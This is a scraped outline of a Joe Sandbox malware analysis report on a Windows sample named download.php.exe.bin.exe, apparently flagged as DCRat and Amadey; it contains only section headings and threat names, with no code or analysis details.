Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report download.php.exe.bin.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DCRat

Threatname: Amadey

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
download.php.exe.bin.exe